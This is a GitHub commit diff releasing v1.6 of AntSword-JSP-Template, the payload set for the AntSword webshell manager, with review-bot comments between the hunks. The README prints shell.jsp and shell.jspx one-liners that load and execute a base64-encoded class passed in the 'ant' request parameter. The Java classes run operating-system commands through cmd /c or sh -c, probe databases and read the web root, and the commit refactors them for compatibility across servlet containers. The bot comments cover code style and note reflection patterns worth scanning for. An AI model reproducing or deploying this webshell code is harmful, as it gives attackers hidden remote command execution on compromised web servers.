
Merge pull request #6 from AntSwordProject/dev
release v1.6
yzddmr6 authored May 14, 2021
2 parents b94c067 + 46bfcc4 commit 54316e2
Showing 36 changed files with 1,336 additions and 1,057 deletions.
35 changes: 29 additions & 6 deletions README.md
@@ -1,4 +1,4 @@
# AntSword-JSP-Template v1.5
# AntSword-JSP-Template v1.6

中国蚁剑JSP一句话Payload

Expand Down Expand Up @@ -76,7 +76,7 @@ shell.jsp
<%
String cls = request.getParameter("ant");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
}
%>
```
Expand Down Expand Up @@ -113,12 +113,28 @@ shell.jspx
<jsp:scriptlet>
String cls = request.getParameter("ant");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
}
</jsp:scriptlet>
</jsp:root>
```
其中`pageContext`可以替换为`request`,以实现对内存Webshell的兼容。
其中

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});`

可以替换为

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);`

这种写法支持Tomcat/Weblogic,不支持如SpringBoot等不自带pageContext的容器。

或者

`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);`

这种写法支持Tomcat/SpringBoot/Weblogic等容器。原理是使用反射自动从request中提取出response,遇到比较特殊的容器可能会提取失败。

后两种为不推荐的写法,可能会在未来移除。

## 解码器

Expand Down Expand Up @@ -173,10 +189,17 @@ $ base64 -w 0 AsoutputReverse.class
}
```


## 更新日志

### v1.5
### v 1.6


1. equals支持数组传参方式,兼容各种容器
2. build.py中可以手动指定版本号编译,不再需要下载指定jdk
3. 部分变量转为类属性,方便调试
4. 修正 insert/update/delete 语句无法执行问题

### v 1.5

1. 支持解码器(返回包加密)
2. 修复base64编码问题&改正错别字
7 changes: 5 additions & 2 deletions build.py
Expand Up @@ -11,6 +11,8 @@

# javac路径 如果 javac 不在 PATH 中, 请自己添加
javapath = r'javac'
# javac编译版本
version = '1.5'

pathsep = os.pathsep
distDir = "./dist/"
Expand All @@ -28,10 +30,11 @@
path = os.path.join(root, f)
print('------------------------------------------------------------')
print(path)
cmd = '"{javapath}" -cp {classpath} {path}'.format(
cmd = '"{javapath}" -cp {classpath} -source {version} -target {version} {path} '.format(
javapath=javapath,
classpath=classpath,
path=path
path=path,
version=version
)
print(cmd)
p=subprocess.Popen(
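Review bot: The new default `version = '1.5'` under the `# javac编译版本` comment is rejected by javac 9 and later, which dropped `-source`/`-target` 1.5, so the default only builds with an older JDK even though the changelog says a specific JDK is no longer needed; the comment should state that constraint, e.g. `# javac -source/-target level; javac 9+ no longer accepts 1.5, use 6 or higher there`. The `cmd` string is still assembled by interpolating `path` and `classpath` into one string, and the `subprocess.Popen(` call that consumes it continues outside the hunk; if that call runs the string through a shell, a path containing spaces or shell metacharacters breaks the command, whereas passing an argument list avoids the quoting problem entirely. The trailing space after `{path}` in the new format string looks unintended and can be dropped.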
69 changes: 38 additions & 31 deletions src/base/Info.java
Expand Up @@ -8,40 +8,15 @@
public class Info {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkeydecoder = "antswordargdecoder";
Expand Down Expand Up @@ -86,10 +61,42 @@ String WwwRootPathCode(String d) {
return s.toString();
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
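Review bot: `parseObj` is added with no documentation of the argument shapes it accepts, and the identical method is pasted into src/base/Probedb.java and src/command/Exec.java in the same commit, so the three copies will drift; each copy should carry a Javadoc along the lines of `/** Fills request/response from an Object[]{request, response}, a PageContext, or an HttpServletRequest; both fields stay null when nothing matches. */`, and ideally the method would live in one shared class. In the array branch, `data[0]` and `data[1]` are read without a length check, so a one-element array throws `ArrayIndexOutOfBoundsException` straight out of `equals`, and the innermost `catch (Exception ignored) {}` discards the reason the fallback failed. The `equals(Object)` override that now calls `parseObj` performs side effects and its body continues outside the hunk. From a defensive reading, the `Class.forName("javax.servlet.jsp.PageContext")` lookup combined with `setAccessible(true)` on private request fields is exactly the reflection pattern a code review or static scan of deployed JSP pages should flag.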
70 changes: 38 additions & 32 deletions src/base/Probedb.java
Expand Up @@ -7,41 +7,15 @@
public class Probedb {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}

randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkeydecoder = "antswordargdecoder";
Expand Down Expand Up @@ -83,10 +57,42 @@ String ProbedbCode(HttpServletRequest r) {
return ret;
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
75 changes: 40 additions & 35 deletions src/command/Exec.java
Expand Up @@ -13,40 +13,15 @@
public class Exec {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder;
public String cs;
public String randomPrefix;
public String encoder = "base64";
public String cs = "antswordCharset";
public String randomPrefix = "antswordrandomPrefix";
public String decoderClassdata;

@Override
public boolean equals(Object obj) {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
this.parseObj(obj);
StringBuffer output = new StringBuffer();
String tag_s = "->|";
String tag_e = "|<-";
String varkey1 = "antswordargbin";
Expand Down Expand Up @@ -101,7 +76,7 @@ String decode(String str) throws Exception {
}

public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
StringBuffer sb = new StringBuffer("");
StringBuffer sb = new StringBuffer();
String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
Map<String, String> readonlyenv = System.getenv();
Map<String, String> cmdenv = new HashMap<String, String>(readonlyenv);
Expand All @@ -127,9 +102,7 @@ public String ExecuteCommandCode(String cmdPath, String command, String envstr)
boolean isWin() {
String osname = System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
return osname.startsWith("win");
}

void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
Expand All @@ -141,10 +114,42 @@ void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
br.close();
}

public void parseObj(Object obj) {
if (obj.getClass().isArray()) {
Object[] data = (Object[]) obj;
request = (HttpServletRequest) data[0];
response = (HttpServletResponse) data[1];
} else {
try {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Field req = request.getClass().getDeclaredField("request");
req.setAccessible(true);
HttpServletRequest request2 = (HttpServletRequest) req.get(request);
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

}
}
}
}
}
}

public String asoutput(String str) {
try {
byte[] classBytes = Base64DecodeToByte(decoderClassdata);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
return cc.getConstructor(String.class).newInstance(str).toString();
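Review bot: `ExecuteCommandCode` changes `new StringBuffer("")` to `new StringBuffer()` but keeps `StringBuffer` for a local that is never shared between threads, and the same applies to `StringBuffer output` in the `equals` hunks of this file, src/base/Info.java and src/base/Probedb.java; `StringBuilder sb = new StringBuilder();` is the idiomatic choice when no synchronization is needed, provided `CopyInputStream`, which receives the same buffer, is changed alongside. In `isWin`, the new one-line `return osname.startsWith("win");` is fine, but the context line `osname = osname.toLowerCase();` above it still lowercases in the default locale, so under locales with special casing rules (Turkish `I` becomes dotless `ı`) the prefix test misfires; `osname.toLowerCase(Locale.ROOT)` is the usual fix and `System.getProperty("os.name")` should be null-checked before it is dereferenced. `ExecuteCommandCode`'s body continues outside the hunk.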